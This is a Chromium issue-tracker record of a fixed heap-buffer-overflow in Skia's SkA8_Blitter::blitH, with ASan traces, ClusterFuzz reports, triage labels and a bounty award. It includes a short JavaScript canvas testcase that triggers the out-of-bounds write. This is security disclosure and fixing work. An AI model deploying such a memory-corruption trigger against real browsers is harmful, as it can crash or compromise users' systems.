
Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Heap-buffer-overflow in SkA8_Blitter::blitH

Reported by attek...@gmail.com, Aug 6 2012

Issue description

Repro-file as attachment.

ASAN Chromium 22.0.1228.0 

ASAN-report:
==2861== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f553684113a at pc 0x7f554e128838 bp 0x7ffff1766c40 sp 0x7ffff1766c38
WRITE of size 1 at 0x7f553684113a thread T0
    #0 0x7f554e128837 in SkA8_Blitter::blitH(int, int, int) ???:0
    #1 0x7f554dfec235 in sk_fill_path(SkPath const&, SkIRect const*, SkBlitter*, int, int, int, SkRegion const&) ???:0
    #2 0x7f554dfee45e in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) ???:0
    #3 0x7f554dfe1a9a in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool) ???:0
    #4 0x7f554dfe2af7 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*) ???:0
    #5 0x7f554df6becc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const ???:0
    #6 0x7f554dfdc43c in SkScalerContext::getImage(SkGlyph const&) ???:0
    #7 0x7f554df7ef88 in SkGlyphCache::findImage(SkGlyph const&) ???:0
...
Attachment: chrome-heap-buffer-overflow-SkA8BlitterblitH-afb.html (533 bytes)
Cc: epoger@chromium.org
Owner: reed@chromium.org
Status: Assigned
Mike, you just fixed a similar bug in this code area. Looks like we missed some place?
Cc: tomhud...@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Internals-Skia SecSeverity-Medium OS-All Stability-AddressSanitizer SecImpacts-Stable SecImpacts-Beta
Looks similar to http://code.google.com/p/chromium/issues/detail?id=138238. ClusterFuzz report coming: https://cluster-fuzz.appspot.com/testcase?key=90585092

Comment 4 by reed@chromium.org, Aug 6 2012

I see an assert in the debug build, where I have overflowing a coefficient .6 -> .16. Am pondering a solution.
Summary: Heap-buffer-overflow in SkA8_Blitter::blitH
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=90585092

Uploader: inferno@chromium.org

Crash Type: Heap-buffer-overflow WRITE 1
Crash Address: 0x7f9ae016aa49
Crash State:
  - crash stack -
  SkA8_Blitter::blitH
  sk_fill_path
  SkScan::FillPath
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=116541:116563

Minimized Testcase (0.37 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv96WrRSrQgpRHwh7wExW9-jxQ8cccZH3IIA--_Lb8tpNw9_4gEO_QOl4TSwXyOO0CZ5ZYIVzthPrtCvvZkTo0SZJbxDCbEVkWscnzdEg4QO8arMYwkx00AQ3zF2LA50WyypWryUFBhlzczZA0c05Lh3nGCChsAPlJ7Ihbfb31M93iVen1Ck
</body>
<script>var canvas=document.body.appendChild(document.createElement("canvas"));
var ctx=canvas.getContext("2d")
try{ctx.lineWidth="700";}catch(e){}
try{ctx.font="italic normal 300 larger/196 Courier New";}catch(e){}
try{ctx.setTransform(0.1,1,-0.7,5,4,6);}catch(e){}
try{ctx.transform(1,6,-0.9,0.7,1,4);}catch(e){}
try{ctx.strokeText("���", 1,1,1);}catch(e){};


</script>
Labels: -SecSeverity-Medium SecSeverity-High
Sorry, this is sec-high.

Comment 7 by reed@chromium.org, Aug 6 2012

Fixed in Skia rev. 4960.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased

Comment 9 by ClusterFuzz, Aug 7 2012

ClusterFuzz has detected this issue as fixed in range 150333:150342.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=90585092

Uploader: inferno@chromium.org

Crash Type: Heap-buffer-overflow WRITE 1
Crash Address: 0x7f9ae016aa49
Crash State:
  - crash stack -
  SkA8_Blitter::blitH
  sk_fill_path
  SkScan::FillPath
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=116541:116563
Fixed: https://cluster-fuzz.appspot.com/revisions?range=150333:150342

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96WrRSrQgpRHwh7wExW9-jxQ8cccZH3IIA--_Lb8tpNw9_4gEO_QOl4TSwXyOO0CZ5ZYIVzthPrtCvvZkTo0SZJbxDCbEVkWscnzdEg4QO8arMYwkx00AQ3zF2LA50WyypWryUFBhlzczZA0c05Lh3nGCChsAPlJ7Ihbfb31M93iVen1Ck

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 10 by k...@google.com, Aug 8 2012

Labels: Mstone-22
Labels: -Mstone-22 Mstone-21
Labels: reward-topanel
Cc: epoger@google.com

Comment 14 by epoger@google.com, Sep 12 2012

Fix merged into Skia's chrome/m22_1229 branch as https://code.google.com/p/skia/source/detail?r=5510

Do we still need to merge this into M21 also?
Labels: -Merge-Approved -Mstone-21 Merge-Merged Mstone-22
No, we don't need it for M21.
Labels: -reward-topanel reward-1000 reward-unpaid
OOB write. $1000. Thx.
Labels: -reward-unpaid

Comment 18 by cdn@chromium.org, Nov 26 2012

Cc: ukbe...@gmail.com
CCing David Belcher from RIM so that they can assess whether they are affected.
Status: Fixed

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -Internals-Skia -SecSeverity-High -Stability-AddressSanitizer -SecImpacts-Stable -SecImpacts-Beta -Mstone-22 Cr-Internals-Skia Security-Impact-Beta M-22 Cr-Internals Security-Severity-High Security-Impact-Stable Type-Bug-Security Performance-Memory-AddressSanitizer
Labels: -Restrict-View-SecurityNotify

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 24 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 25 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer

Comment 26 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 27 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
